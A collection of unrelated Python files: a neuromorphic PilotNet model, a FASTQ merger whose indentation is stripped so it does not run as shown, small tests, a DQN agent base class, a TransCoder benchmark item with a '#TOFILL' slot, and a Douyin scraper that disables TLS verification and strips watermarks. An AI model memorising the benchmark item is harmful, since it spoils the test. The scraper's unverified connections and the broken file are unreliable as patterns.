            pop_and_add(connected_set[cmin[1]], new_ip, consecutive_frames)

    i = 0
    while i < len(added_matched):
        if not added_matched[i]:
            pop_and_add(matched_ip_set[i], None, consecutive_frames)
            if matched_ip_set[i] == [None for _ in range(consecutive_frames)]:
                matched_ip_set.pop(i)
                # re_matrix.pop(i)
                # gf_matrix.pop(i)
                added_matched.pop(i)
                continue
        i += 1
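
# Editor's sanity check (addition): get_angle returns the signed angle from v0
# to v1, so rotating +x onto +y gives +pi/2.
def _check_get_angle():
    assert abs(get_angle(np.array([1., 0.]), np.array([0., 1.])) - np.pi / 2) < 1e-9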
d15022f4a88c68da8665eed5eb539b96905e093a | 3335 bytes | py | project/models/pilotnet_sdn.py | Barchid/lava-dl-lightning | Apache-2.0

import torch
import torch.nn.functional as F
import matplotlib.pyplot as plt

import lava.lib.dl.slayer as slayer


def event_rate_loss(x, max_rate=0.01):
    mean_event_rate = torch.mean(torch.abs(x))
    return F.mse_loss(F.relu(mean_event_rate - max_rate), torch.zeros_like(mean_event_rate))


class Network(torch.nn.Module):
    def __init__(self, threshold=0.1, tau_grad=0.5, scale_grad=1., dropout=0.2):
        super(Network, self).__init__()

        sdnn_params = {  # sigma-delta neuron parameters
            'threshold': threshold,    # delta unit threshold
            'tau_grad': tau_grad,      # delta unit surrogate gradient relaxation parameter
            'scale_grad': scale_grad,  # delta unit surrogate gradient scale parameter
            'requires_grad': True,     # trainable threshold
            'shared_param': True,      # layer wise threshold
            'activation': F.relu,      # activation function
        }
        sdnn_cnn_params = {  # conv layer has additional mean only batch norm
            **sdnn_params,                                 # copy all sdnn_params
            'norm': slayer.neuron.norm.MeanOnlyBatchNorm,  # mean only quantized batch normalization
        }
        sdnn_dense_params = {  # dense layers have additional dropout units enabled
            **sdnn_cnn_params,                            # copy all sdnn_cnn_params
            'dropout': slayer.neuron.Dropout(p=dropout),  # neuron dropout
        }

        self.blocks = torch.nn.ModuleList([  # sequential network blocks
            # delta encoding of the input
            slayer.block.sigma_delta.Input(sdnn_params),
            # convolution layers
            slayer.block.sigma_delta.Conv(sdnn_cnn_params, 3, 24, 3, padding=0,
                                          stride=2, weight_scale=2, weight_norm=True),
            slayer.block.sigma_delta.Conv(sdnn_cnn_params, 24, 36, 3, padding=0,
                                          stride=2, weight_scale=2, weight_norm=True),
            slayer.block.sigma_delta.Conv(sdnn_cnn_params, 36, 64, 3, padding=(1, 0),
                                          stride=(2, 1), weight_scale=2, weight_norm=True),
            slayer.block.sigma_delta.Conv(sdnn_cnn_params, 64, 64, 3, padding=0,
                                          stride=1, weight_scale=2, weight_norm=True),
            # flatten layer
            slayer.block.sigma_delta.Flatten(),
            # dense layers
            slayer.block.sigma_delta.Dense(sdnn_dense_params, 64 * 40, 100, weight_scale=2, weight_norm=True),
            slayer.block.sigma_delta.Dense(sdnn_dense_params, 100, 50, weight_scale=2, weight_norm=True),
            slayer.block.sigma_delta.Dense(sdnn_dense_params, 50, 10, weight_scale=2, weight_norm=True),
            # linear readout with sigma decoding of output
            slayer.block.sigma_delta.Output(sdnn_dense_params, 10, 1, weight_scale=2, weight_norm=True)
        ])

    def forward(self, x):
        for block in self.blocks:
            x = block(x)
        return x

    def grad_flow(self, path):
        # helps monitor the gradient flow
        grad = [b.synapse.grad_norm for b in self.blocks if hasattr(b, 'synapse')]

        plt.figure()
        plt.semilogy(grad)
        plt.savefig(path + 'gradFlow.png')
        plt.close()

        return grad
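
# Editor's smoke test (not in the original file; assumes lava-dl's sigma-delta
# blocks accept NCHWT tensors). The 64*40 flattened size in the first Dense
# layer implies a 3x33x100 input: heights go 33->16->7->4->2, widths go
# 100->49->24->22->20, and 64*2*20 == 64*40. The trailing dimension is time.
if __name__ == '__main__':
    net = Network()
    dummy = torch.rand(1, 3, 33, 100, 16)  # batch, channel, height, width, time
    out = net(dummy)
    print(out.shape)  # expected: torch.Size([1, 1, 16])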
d1504b5e1a66f44f2bbe9a4a52589a12450fc480 | 3543 bytes | py | htsworkflow/pipelines/desplit_fastq.py | detrout/htsworkflow | BSD-3-Clause

#!/usr/bin/env python
"""Write fastq data from multiple compressed files into a single file
"""
import bz2
import gzip
from glob import glob
import os
from optparse import OptionParser
import sys
from htsworkflow.util.version import version
from htsworkflow.util.opener import autoopen, isurllike
from htsworkflow.util.conversion import parse_slice
SEQ_HEADER = 0
SEQUENCE = 1
QUAL_HEADER = 2
QUALITY = 3
INVALID = -1
def main(cmdline=None):
"""Command line driver: [None, 'option', '*.fastq.bz2']
"""
parser = make_parser()
opts, args = parser.parse_args(cmdline)
if opts.version:
print (version())
return 0
if opts.output is not None:
output = open_output(opts.output, opts)
else:
output = sys.stdout
desplitter = DesplitFastq(file_generator(args), output)
desplitter.trim = parse_slice(opts.slice)
desplitter.run()
return 0
def make_parser():
"""Generate an option parser for above main function"""
usage = '%prog: [options] *.fastq.gz'
parser = OptionParser(usage)
parser.add_option('-o', '--output', default=None,
help='output fastq file')
parser.add_option('-s', '--slice',
help="specify python slice, e.g. 0:75, 0:-1",
default=None)
parser.add_option('--gzip', default=False, action='store_true',
help='gzip output')
parser.add_option('--bzip', default=False, action='store_true',
help='bzip output')
parser.add_option("--version", default=False, action="store_true",
help="report software version")
return parser
def open_output(output, opts):
"""Open output file with right compression library
"""
if opts.bzip:
return bz2.open(output, 'wt')
elif opts.gzip:
return gzip.open(output, 'wt')
else:
return open(output, 'w')
def file_generator(pattern_list):
"""Given a list of glob patterns return decompressed streams
"""
for pattern in pattern_list:
if isurllike(pattern, 'rt'):
yield autoopen(pattern, 'rt')
else:
for filename in glob(pattern):
yield autoopen(filename, 'rt')
class DesplitFastq(object):
"""Merge multiple fastq files into a single file"""
def __init__(self, sources, destination):
self.sources = sources
self.destination = destination
self.making_fastq = True
self.trim = slice(None)
def run(self):
"""Do the conversion
This is here so we can run via threading/multiprocessing APIs
"""
state = SEQ_HEADER
files_read = 0
for stream in self.sources:
files_read += 1
for line in stream:
line = line.rstrip()
if state == SEQ_HEADER:
self.destination.write(line)
state = SEQUENCE
elif state == SEQUENCE:
self.destination.write(line[self.trim])
state = QUAL_HEADER
elif state == QUAL_HEADER:
self.destination.write(line)
state = QUALITY
elif state == QUALITY:
self.destination.write(line[self.trim])
state = SEQ_HEADER
self.destination.write(os.linesep)
if files_read == 0:
raise RuntimeError("No files processed")
if __name__ == "__main__":
main()
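
# Editor's usage sketch (hypothetical file names): drive the merger from
# Python instead of the CLI, trimming reads and qualities to 75 characters.
def _example_merge():
    with open('merged.fastq', 'w') as out:
        merger = DesplitFastq(file_generator(['lane1_*.fastq.gz']), out)
        merger.trim = parse_slice('0:75')
        merger.run()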
d1512f6092d7ca8b600283a45a28d8f247b869fe | 538 bytes | py | test/test_getRevDns.py | hotpeppersec/Assassin | Apache-2.0

# -*- coding: utf-8 -*-
"""
"""
import pytest
import json
from assassin.lib.helper_functions import validate_ip
from assassin.lib.helper_functions import getRevDns
def test_getRevDns_com(capsys):
response = []
response = getRevDns('173.245.58.51')
assert 'ns1.digitalocean.com.' in response
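
def test_validate_ip():
    # Editor's addition exercising the otherwise-unused validate_ip import; it
    # assumes the helper is truthy for a well-formed public IPv4 address.
    assert validate_ip('173.245.58.51')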

__author__ = 'Franklin Diaz'
__copyright__ = ''
__credits__ = ['{credit_list}']
__license__ = 'http://www.apache.org/licenses/LICENSE-2.0'
__version__ = ''
__maintainer__ = ''
__email__ = 'fdiaz@paloaltonetworks.com'
d1513d100c1921d1e2f9846b7e329d203bde39cf | 2471 bytes | py | agents/base_agent.py | floringogianu/categorical-dqn | MIT

import time
from termcolor import colored as clr
from utils import not_implemented


class BaseAgent(object):
    def __init__(self, env_space):
        self.actions = env_space[0]
        self.action_no = self.actions.n
        self.state_dims = env_space[1].shape[0:2]

        self.step_cnt = 0
        self.ep_cnt = 0
        self.ep_reward_cnt = 0
        self.ep_reward = []
        self.max_mean_rw = -100

    def evaluate_policy(self, obs):
        not_implemented(self)

    def improve_policy(self, _state, _action, reward, state, done):
        not_implemented(self)

    def gather_stats(self, reward, done):
        self.step_cnt += 1
        self.ep_reward_cnt += reward
        if done:
            self.ep_cnt += 1
            self.ep_reward.append(self.ep_reward_cnt)
            self.ep_reward_cnt = 0

    def display_setup(self, env, config):
        emph = ["env_name", "agent_type", "label", "batch_size", "lr",
                "hist_len"]
        print("-------------------------------------------------")
        for k in config.__dict__:
            if config.__dict__[k] is not None:
                v = config.__dict__[k]
                space = "." * (32 - len(k))
                config_line = "%s: %s %s" % (k, space, v)
                for e in emph:
                    if k == e:
                        config_line = clr(config_line, attrs=['bold'])
                print(config_line)
        print("-------------------------------------------------")
        custom = {"no_of_actions": self.action_no}
        for k, v in custom.items():
            space = "." * (32 - len(k))
            print("%s: %s %s" % (k, space, v))
        print("-------------------------------------------------")

    def display_stats(self, start_time):
        # self.cmdl and self.name are expected to be set by concrete agents
        fps = self.cmdl.report_frequency / (time.perf_counter() - start_time)
        print(clr("[%s] step=%7d, fps=%.2f " % (self.name, self.step_cnt, fps),
                  attrs=['bold']))
        self.ep_reward.clear()

    def display_final_report(self, ep_cnt, step_cnt, global_time):
        elapsed_time = time.perf_counter() - global_time
        fps = step_cnt / elapsed_time
        print(clr("[ %s ] finished after %d eps, %d steps. "
                  % ("Main", ep_cnt, step_cnt), 'white', 'on_grey'))
        print(clr("[ %s ] finished after %.2fs, %.2ffps. "
                  % ("Main", elapsed_time, fps), 'white', 'on_grey'))

    def display_model_stats(self):
        pass
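
# Editor's sketch of a minimal concrete agent (hypothetical; not part of the
# repo). Subclasses are expected to provide self.name/self.cmdl themselves and
# to override the two policy hooks.
class RandomAgent(BaseAgent):
    def __init__(self, env_space):
        super(RandomAgent, self).__init__(env_space)
        self.name = "Random"

    def evaluate_policy(self, obs):
        return self.actions.sample()  # gym-style action space assumed

    def improve_policy(self, _state, _action, reward, state, done):
        pass  # a random agent never learns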
d153d8522b0db3f1572038e9720026aa1f6a282f | 851 bytes | py | tests/test_state_metrics/test_trace_distance.py | paniash/toqito | MIT

"""Tests for trace_distance."""
import numpy as np

from toqito.state_metrics import trace_distance
from toqito.states import basis


def test_trace_distance_same_state():
    r"""Test that :math:`T(\rho, \sigma) = 0` iff :math:`\rho = \sigma`."""
    e_0, e_1 = basis(2, 0), basis(2, 1)
    e_00 = np.kron(e_0, e_0)
    e_11 = np.kron(e_1, e_1)

    u_vec = 1 / np.sqrt(2) * (e_00 + e_11)
    rho = u_vec * u_vec.conj().T
    sigma = rho

    res = trace_distance(rho, sigma)

    np.testing.assert_equal(np.isclose(res, 0), True)


def test_trace_distance_non_density_matrix():
    r"""Test trace distance on non-density matrix."""
    rho = np.array([[1, 2], [3, 4]])
    sigma = np.array([[5, 6], [7, 8]])

    with np.testing.assert_raises(ValueError):
        trace_distance(rho, sigma)


if __name__ == "__main__":
    np.testing.run_module_suite()
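
# Editor's addition: for orthogonal pure states the trace distance is maximal,
# T(|0><0|, |1><1|) = 1, which complements the two cases tested above.
def test_trace_distance_orthogonal_states():
    e_0, e_1 = basis(2, 0), basis(2, 1)
    rho = e_0 * e_0.conj().T
    sigma = e_1 * e_1.conj().T
    np.testing.assert_equal(np.isclose(trace_distance(rho, sigma), 1), True)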
d1574ac3116c191f004f447f2413fccfc277754b | 750 bytes | py | data/transcoder_evaluation_gfg/python/CALCULATE_VOLUME_DODECAHEDRON.py | mxl1n/CodeGen | MIT

# Copyright (c) 2019-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
import math


def f_gold(side):
    return (((15 + (7 * (math.sqrt(5)))) / 4) * (math.pow(side, 3)))
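
# Editor's note (addition): f_gold implements the regular-dodecahedron volume
# formula V = ((15 + 7*sqrt(5)) / 4) * side**3, so a unit dodecahedron is about
# 7.6631 cubic units.
assert abs(f_gold(1) - 7.663118960624632) < 1e-9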

#TOFILL

if __name__ == '__main__':
    param = [
        (56,),
        (73,),
        (22,),
        (10,),
        (84,),
        (20,),
        (51,),
        (91,),
        (10,),
        (83,)
    ]
    n_success = 0
    for i, parameters_set in enumerate(param):
        if abs(1 - (0.0000001 + abs(f_gold(*parameters_set))) / (abs(f_filled(*parameters_set)) + 0.0000001)) < 0.001:
            n_success += 1
    print("#Results: %i, %i" % (n_success, len(param)))
d159c73f1a62af8d6b47a255f92f31f0c88a5090 | 5518 bytes | py | douyin/douyin_pro.py | Adsryen/python-spiders | MIT

#!/usr/bin/env python
# encoding: utf-8
'''
#-------------------------------------------------------------------
# CONFIDENTIAL --- CUSTOM STUDIOS
#-------------------------------------------------------------------
#
# @Project Name : Douyin download assistant (enhanced edition)
#
# @File Name : main.py
#
# @Programmer : autofelix
#
# @Start Date : 2022/01/09 13:14
#
# @Last Update : 2022/01/09 13:14
#
#-------------------------------------------------------------------
'''
from splinter.driver.webdriver.chrome import Options, Chrome
from splinter.browser import Browser
from contextlib import closing
import requests, json, time, re, os, sys  # 'time' was imported twice in the original
from bs4 import BeautifulSoup


class DouYin(object):
    def __init__(self, width=500, height=300):
        """
        Douyin App video downloader
        """
        # headless browser
        chrome_options = Options()
        chrome_options.add_argument('user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"')
        self.driver = Browser(driver_name='chrome', executable_path='D:/chromedriver', options=chrome_options, headless=True)

    def get_video_urls(self, user_id):
        """
        Fetch the video share URLs for a user

        Parameters:
            user_id: the user ID to look up
        Returns:
            video_names: list of video file names
            video_urls: list of video share links
            nickname: the user's nickname
        """
        video_names = []
        video_urls = []
        unique_id = ''
        while unique_id != user_id:
            search_url = 'https://api.amemv.com/aweme/v1/discover/search/?cursor=0&keyword=%s&count=10&type=1&retry_type=no_retry&iid=17900846586&device_id=34692364855&ac=wifi&channel=xiaomi&aid=1128&app_name=aweme&version_code=162&version_name=1.6.2&device_platform=android&ssmix=a&device_type=MI+5&device_brand=Xiaomi&os_api=24&os_version=7.0&uuid=861945034132187&openudid=dc451556fc0eeadb&manifest_version_code=162&resolution=1080*1920&dpi=480&update_version_code=1622' % user_id
            req = requests.get(url=search_url, verify=False)
            html = json.loads(req.text)
            aweme_count = html['user_list'][0]['user_info']['aweme_count']
            uid = html['user_list'][0]['user_info']['uid']
            nickname = html['user_list'][0]['user_info']['nickname']
            unique_id = html['user_list'][0]['user_info']['unique_id']
        user_url = 'https://www.douyin.com/aweme/v1/aweme/post/?user_id=%s&max_cursor=0&count=%s' % (uid, aweme_count)
        req = requests.get(url=user_url, verify=False)
        html = json.loads(req.text)
        i = 1
        for each in html['aweme_list']:
            share_desc = each['share_info']['share_desc']
            # '抖音-原创音乐短视频社区' is the API's default share text for untitled videos
            if '抖音-原创音乐短视频社区' == share_desc:
                video_names.append(str(i) + '.mp4')
                i += 1
            else:
                video_names.append(share_desc + '.mp4')
            video_urls.append(each['share_info']['share_url'])

        return video_names, video_urls, nickname

    def get_download_url(self, video_url):
        """
        Get the watermarked video download address

        Parameters:
            video_url: the video's share page address
        Returns:
            download_url: the watermarked video download address
        """
        req = requests.get(url=video_url, verify=False)
        bf = BeautifulSoup(req.text, 'lxml')
        script = bf.find_all('script')[-1]
        video_url_js = re.findall(r'var data = \[(.+)\];', str(script))[0]
        video_html = json.loads(video_url_js)
        download_url = video_html['video']['play_addr']['url_list'][0]
        return download_url

    def video_downloader(self, video_url, video_name, watermark_flag=True):
        """
        Download a video

        Parameters:
            video_url: the video's share page address
            video_name: output file name
            watermark_flag: whether to download the watermark-free version
        Returns:
            None
        """
        size = 0
        if watermark_flag == True:
            video_url = self.remove_watermark(video_url)
        else:
            video_url = self.get_download_url(video_url)

        with closing(requests.get(video_url, stream=True, verify=False)) as response:
            chunk_size = 1024
            content_size = int(response.headers['content-length'])
            if response.status_code == 200:
                sys.stdout.write('  [File size]: %0.2f MB\n' % (content_size / chunk_size / 1024))
                with open(video_name, "wb") as file:
                    for data in response.iter_content(chunk_size=chunk_size):
                        file.write(data)
                        size += len(data)
                        file.flush()
                        sys.stdout.write('  [Progress]: %.2f%%' % float(size / content_size * 100) + '\r')
                        sys.stdout.flush()

    def remove_watermark(self, video_url):
        """
        Get the watermark-free video download address

        Parameters:
            video_url: the video's share page address
        Returns:
            the watermark-free video download address
        """
        self.driver.visit('http://douyin.iiilab.com/')
        self.driver.find_by_tag('input').fill(video_url)
        self.driver.find_by_xpath('//button[@class="btn btn-default"]').click()
        html = self.driver.find_by_xpath('//div[@class="thumbnail"]/div/p')[0].html
        bf = BeautifulSoup(html, 'lxml')
        return bf.find('a').get('href')

    def run(self):
        """
        Main entry point

        Parameters:
            None
        Returns:
            None
        """
        self.hello()
        user_id = input('Enter a user ID (e.g. 40103580): ')
        video_names, video_urls, nickname = self.get_video_urls(user_id)
        if nickname not in os.listdir():
            os.mkdir(nickname)
        print('Downloading videos: %d posts in total!\n' % len(video_urls))
        for num in range(len(video_urls)):
            print('  Resolving video link %d [%s], please wait!\n' % (num + 1, video_urls[num]))
            if '\\' in video_names[num]:
                video_name = video_names[num].replace('\\', '')
            elif '/' in video_names[num]:
                video_name = video_names[num].replace('/', '')
            else:
                video_name = video_names[num]
            self.video_downloader(video_urls[num], os.path.join(nickname, video_name))
            print('\n')
        print('Download complete!')

    def hello(self):
        """
        Print the welcome banner

        Parameters:
            None
        Returns:
            None
        """
        print('*' * 100)
        print('\t\t\t\tDouyin App video download assistant')
        print('*' * 100)


if __name__ == '__main__':
    douyin = DouYin()
    douyin.run()
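
# Editor's note on running this script (assumptions based on the imports
# above): it needs Chrome plus a matching chromedriver at D:/chromedriver and
# the splinter/bs4/requests packages, e.g.
#   pip install splinter beautifulsoup4 requests lxml
#   python douyin_pro.py   # then enter a user ID such as 40103580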